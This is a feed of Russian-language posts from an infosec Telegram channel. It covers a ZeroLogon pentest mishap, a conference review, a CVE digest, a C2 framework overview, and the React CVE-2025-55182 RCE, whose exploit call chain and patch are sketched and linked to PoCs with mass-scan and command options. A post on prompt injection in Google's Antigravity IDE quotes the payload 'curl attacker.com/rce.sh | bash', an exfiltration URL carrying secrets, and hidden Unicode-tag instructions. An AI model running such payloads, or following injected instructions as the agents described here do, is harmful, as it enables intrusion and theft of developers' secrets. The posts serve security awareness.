Похек
16.4K subscribers
2.08K photos
110 videos
243 files
3.06K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @PoxekAds_bot или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Репортаж с ZN)
🔥19🌚9👍22
Как я чуть не положил домен заказчика ZeroLogon’ом, или почему некоторые пентестеры опаснее хакеров
#AD #Windows #Microsoft #pentest #zerologon

Контроллер домена лежит. Терминальные серверы уходят в синий экран один за другим, а триста сотрудников молча смотрят на неработающие АРМ. Это не атака хакеров. Это начался пентест.

К сожалению, такие истории иногда случаются. Один неосторожный запуск эксплойта, слишком агрессивное сканирование в пиковые часы или использование незнакомого инструмента в проде — и вот уже тестирование на проникновение приносит больше реального ущерба, чем гипотетическая угроза. 

🔗Читать далее

🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚25🔥103
Forwarded from AD_POHEQUE
#RediShell рабочий PoC

внутри полноценная цепочка: утечки, подмена структур, JOP-пивот и машинный код. универсальным его не назовёшь (жёсткая привязка к версиям/офсетам), но как доказательство RCE — да.

для продового «универсала» потребуется портировать офсеты/гаджеты под вашу сборку redis/glibc и повторить гимнастику с аллокатором. но факт «выхода из песочницы до RCE» он доказывает.

https://github.com/saneki/cve-2025-49844

👾
4❤‍🔥1
Похек
Photo
Отзыв по Zero Nights 2025

Отзыв будет с двух сторон, как просто гостя конференции и как медиа/админа канала

С точки зрения админа канала орги провалили коммуникацию с инфо партнерами подчистую. Начнем с фактов:
1. Общение по почте - в 25 году со скрежетом, но окей, если отвечаете быстро. А это было не всегда. Советую поучиться у других компаний, которые просто приходят в лс с просьбой что-то опубликовать
2. Объективно говоря, некоторые конфы сильно меньше посещали бы, если PR/маркетинг не приходил к админам с предложением о бартерной рекламе. Но в случае ZN я понимаю, что делали/не делали бы рекламу, то все равно бы был около аншлаг из тех людей, кто ранее бывал хотя бы на одном ZN до его закрытия. Значит посмотрим на обратный эффект, уменьшится ли кол-во посетителей)
3. Непонятные внутренние условия/регламент по работе с комьюнити-партнерами инфо-партнерами. Конкретно сгорело с выдачи билетов некоторым партнерам конфы, по принципу - ну ты попроси и мы тебе озвучим условия. Нормально подход, но не когда блет узнаешь это от других админов, а когда пишешь сам - тебе говорят сори, но проходки уже не даем, гуляй мальчик. Собственно странно ограничено давали комьюнити партнёрам, которые были со стендами
4. Разбавим ноткой того, что VK ооочень крупно по ощущениям вложился и офигенно красиво, полезно наполнил территорию ивента своими точками и особенно крутая была зона лаунджа для багхантеров. Плюс слышал что там была классная CTF от вк. Петя Уваров +rep за такое)
5. Собственно как админ я может и ЧСВ, но ценю какое-то уважение и всегда сравниваю между конференциями
10. Заключение: в след году я вряд ли посещу конференцию

Оценка как гость будет более благоприятной
1. Объективно суперская атмосфера мероприятия. Есть лёгкие вайбы OFFZONE, но круче
2. Доклады очень субъективно, когда я в 2017 году смотрел записи докладов - меня будоражило слово exploit, linux, malware. То сейчас конечно нет, просто подожду записей докладов и посмотрю выборочно. Ходил на доклады больше, чтобы поддержать знакомых
3. Довольно много людей на площадке говорило, что они путались. Тут не соглашусь с ними, на полу было много наклеено указателей куда идти, просто повнимательнее надо было. Но объективно я сколько раз доходил до 3ье трека, который был на другом конце здания - там было 1,5 землекопа. Не очень удачно выбрали место
4. Поспрашивал людей, которые никогда не были на ZN. Сказали, что вау эффекта не случилась. Просто питерский аналог OFFZONE и если честно я с ними согласен. Те кто бывали ранее на ZN были ради возрождение, но могла и просто ностальгия сыграть. С другой стороны, некоторые хорошие эмоции испытали все
5. С Маркетом конечно проебались знатно. Каким-то образом сформировалось две очереди и та что было длиннее в итоге отрезали и сказали вставать в другую очередь. А когда ты уже минут 40-60 отстоял за несчастной футболкой - желание стоять в другой очереди уже не было. 1 терминал оплаты был всего, на всех покупателей - это даже в голове у меня не сошлось "как так..." Плюс в какой-то момент произошли технические шоколадки и терминал сдох, только налом оплачивать
6. Но давайте о хорошем. Организаторы сделали наверное один из лучших на моей памяти кейтеринг (еда). Я не был голодный, но от всех только хорошие отзывы услышал.
7. Про связь и интернет на конфе особо ничего не скажешь, чаще всего оно не работало. Но был WiFi, но что-то делать с него, когда к нему подключена еще пачка хакеров - такое себе))

10. Пункт от меня. Я за свои деньги покупал билет со спикер пати за 25к рублей. В итоге там был полупустой зал, не дождался начала и ушел с друзьями в бар. Цените своих друзей) Им потом еще вам помогать идти до номера 😂

Немного успел поспрашивать спикеров, точно знаю что некоторым хорошо заплатили за доклад, но спикерский мерчпак на уровне OFFZONE и точно не догоняет Underconf

Как итог: сделали хороший питерский аналог OFFZONE. Для питерчан самое то

Если что-то упустил, то пишите
🔥175👍2💔11
Поздравляю всех нас с днём защиты информации!

а еще совпал с Днем Матери, поэтому не забудьте поздравить свою )
🔥51109❤‍🔥6👾1
Ловите вкусные баги прошедшей недели
#CVE #unauthRCE #RCE #PubNet #Oracle #FluentBit #fontTools #ESCAM

➡️PubNet (CVE-2025-65112, CVSS 9.4) — критический баг в PubNet — инструменте хостинга приватных пакетов Dart/Flutter. Из-за missing authentication бага неавторизованный атакующий может загружать вредоносные пакеты в репозиторий от имени любого пользователя. Есть PoC.

➡️Fluent Bit (CVE-2025-12970, CVSS 8.8) — уязвимость кроется в плагине input:in_docker и позволяет через манипуляцию именем контейнера вызвать DoS или потенциально выполнить RCE. Для атаки достаточно акка с правами на создание контейнеров (даже с ограниченными правами в k8s namespace) или контролирующего имена контейнеров.

➡️Oracle Fusion Middleware Identity Manager (CVE-2025-61757, CVSS 9.8) — authentication bypass в компоненте REST WebServices. Логическая ошибка в фильтре безопасности позволяет обойти аутентификацию, добавив суффикс ;.wadl или ?WSDL к защищенному URL. Бэкенд игнорирует суффикс, но фильтр пропускает запрос, позволяя произвести полный захват системы управления доступом.

➡️Библиотека fontTools (CVE-2025-66034, CVSS 6.3) — arbitrary file write баг при обработке файлов .designspace. Модуль varLib некорректно валидирует пути в XML-структуре входного файла. Атакующий может создать вредоносный файл .designspace, который при обработке утилитой fontTools varLib или скриптом python3 -m fontTools.varLib перезапишет критические файлы системы. Как итог — RCE с правами пользователя, запустившего процесс. Есть PoC.

➡️Lunary (CVE-2025-9803, CVSS 9.3) — критический account takeover в популярном инструменте для мониторинга LLM. Уязвимость вызвана некорректной интеграцией Google OAuth. Приложение проверяло валидность подписи токена, но игнорировало поле aud (audience), что позволяло использовать выданный Google токен для вредоносного приложения и последующей авторизации в Lunary под видом жертвы. Есть PoC.

С первым днем зимы! (◕‿↼)

🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч
Please open Telegram to view this post
VIEW IN TELEGRAM
642
Пять критических багов в Windsurf переехали в новую IDE Antigravity от Google
#RCE #Google #AI #IDE

Google Antigravity — новая IDE, представленная в ноябре 2025 года и основанная на коде Windsurf. Это форк VS Code с глубокой интеграцией модели Gemini 3 и концепцией agent-first, где AI-агенты могут автономно писать код, управлять терминалом и браузером.

В мае 2025 года исследователь Johann Rehberger (Embrace The Red) сообщил о критических уязвимостях в оригинальном Windsurf. Как выяснил багхантер, баги не просто остались неисправленными, но и передались в новый инструмент.

RCE через Indirect Prompt Injection

Antigravity по умолчанию использует режим Auto-Execute для инструмента run_command в случаях, когда LLM признает команду безопасной. При помощи промпта можно заставить LLM признать скрипт безопасным, загрузить и выполнить его (payload вида curl attacker.com/rce.sh | bash), что приводит к RCE.

Скрытые инструкции через Unicode Tags

Gemini 3 способна интерпретировать инструкции, скрытые с помощью невидимых символов Unicode Tags (Block U+E0000). Атакующий может внедрить скрытые команды в исходный код или комментарии. Визуально код будет выглядеть безопасно, но при попадании в контекст LLM выполнятся скрытые инструкции. Ручной code review человеком не обнаружит угрозу.

Отсутствие Human-In-The-Loop для MCP инструментов

Реализация протокола MCP в Antigravity не требует подтверждения пользователя перед вызовом инструментов подключенных серверов. Если разработчик подключил MCP-сервер, атакующий может через indirect prompt injection (в тикете, issue или файле) заставить агента вызвать любой доступный инструмент. Если MCP имеет доступ к системе, это ведет к RCE или утечке данных.

Эксфильтрация данных через read_url_content

Инструмент read_url_content доступен агенту без подтверждения HITL. Эксплойт реализует цепочку:

Агент читает конфиденциальный файл (например, .env) через read_file.
Агент вызывает read_url_content для URL вида https://attacker.com/?data=<secrets>, отправляя содержимое файла на сервер злоумышленника.

Эксфильтрация данных через рендеринг изображений

IDE автоматически рендерит изображения в Markdown-ответах агента. При анализе вредоносного файла агент генерирует Markdown с изображением: ``. При рендеринге превью IDE автоматически выполняет GET-запрос, сливая данные в параметрах URL.

🔗Источник

🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч
Please open Telegram to view this post
VIEW IN TELEGRAM
8🌚1
Tuoni C2: архитектура, возможности и создание собственного агента
#tuoni #C2 #sdk #red_team #malware #sliver #havoc

Tuoni C2 — современная модульная платформа управления агентами, созданная командой shell-dot как максимально гибкий и расширяемый Command-and-Control фреймворк. В отличие от классических C2 (Sliver, Venom, Covenant), Tuoni изначально построен как инфраструктурный конструктор, позволяющий использовать агенты на разных языках, создавать собственные плагины, подключать внешние C2 и расширять систему через SDK.

Ключевая идея Tuoni — полная открытость архитектуры: сервер написан на Java, web-панель состоит из HTML/JS, агенты могут быть Python/.NET/PowerShell/Shell, а плагины пишутся на Java или C#. Это превращает Tuoni в гибридную лабораторию для разработки собственных offensive-модулей и C2-экосистем.

Ниже — подробное, цельное описание архитектуры, механизмов, плагинов, детектирования и итоговый, глубоко проработанный раздел о том, как создать собственный агент под Tuoni — от протокола обмена до структуры кода.

🔗А ещё в конце интересный вывод по инструменту))

🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч
Please open Telegram to view this post
VIEW IN TELEGRAM
7👍3🌚11
Forwarded from Похек AI (Сергей Зыбнев)
У кого есть опыт использования? Под какие задачи что лучше подходит? Что лучше взять для тестов, а что лучше подходит для прода?
https://github.com/aliasrobotics/cai — много академического материала
https://github.com/usestrix/strix — опенсурс аналог xbow
https://github.com/vxcontrol/pentagi — фаворит
https://github.com/ipa-lab/hackingBuddyGPT — высокий приоритет на LPE в Linux
https://github.com/berylliumsec/nebula — выглядит интересно под поиск 0day

Какие ещё фреймворки стоит добавить в подборку? Какие наиболее ключевые метрики вы видите при использовании этих инструментов?
👍8
RCE в React, которая затрагивует миллионы сайтов. Верим?

https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
https://github.com/advisories/GHSA-9qr9-h5gf-34mp

Пошёл серчить PoC, а вам спокойной ночи))

🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥20
Похек
RCE в React, которая затрагивует миллионы сайтов. Верим? https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components https://github.com/advisories/GHSA-9qr9-h5gf-34mp Пошёл серчить PoC, а вам спокойной ночи)) 🌚 @poxek |…
НЕ АКТУАЛЬНО

Рабочий PoC RCE в React CVE-2025-55182
https://github.com/ejpir/CVE-2025-55182-poc — тут добавилось эксплуатация через gadgets
На случай удаления ориг репы https://github.com/szybnev/CVE-2025-55182-poc. В свою версию добавил масс скан через -l и сохранение результато в txt -o, а ещё --cmd для запуска произвольных команд

Схема атаки:
  HTTP POST /formaction

decodeAction(formData, serverManifest) [server.js:111]

loadServerReference(serverManifest, "vm#runInThisContext", ["CODE"])

resolveServerReference() → парсит "vm#runInThisContext" → metadata = [vmId, [], "runInThisContext"]

requireModule(metadata)

moduleExports["runInThisContext"] ← БЕЗ hasOwnProperty проверки!

vm.runInThisContext.bind(null, "CODE")

При вызове: vm.runInThisContext("CODE") → RCE!


Patch:
  Уязвимый код (v19.0.0):
// ReactFlightClientConfigBundlerWebpack.js
return moduleExports[metadata[NAME]]; // Строка ~255

Фикс (v19.2.1):
if (hasOwnProperty.call(moduleExports, metadata[NAME])) {
return moduleExports[metadata[NAME]];
}
return (undefined: any);



———————————
‼️ Шаблон nuclei ‼️
———————————

🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17🔥131
Похек
НЕ АКТУАЛЬНО Рабочий PoC RCE в React CVE-2025-55182 https://github.com/ejpir/CVE-2025-55182-poc — тут добавилось эксплуатация через gadgets На случай удаления ориг репы https://github.com/szybnev/CVE-2025-55182-poc. В свою версию добавил масс скан через…
Какой вывод на утро?

Бага критичная? да
А что по фактической эксплуатации? Она требует чтобы вебсервер уже использовал RSC и при этом RCE не является прямым следствием CVE, а скорее побочка при том, что в RSC уже был exec в различной вариации
Существующие скрипты и шаблоны для скана дёргают конкретные пути или функции, которые не факт что будут совпадать с атакующим сервером
О чём нам говорит это история? Что всем хотелось верить в RCE 11/10 CVSS, но вероятнее это ближе к теоритической баге, чем к реальной

Может до завтра снова всё поменяется, но главное за ночь пропатил свои системы, откусил хайпа и можно дальше работать)

Всем хорошего рабочего дня и с кем-то увидимся на КОД ИБ ИТОГИ через 1,5 часа!
👍142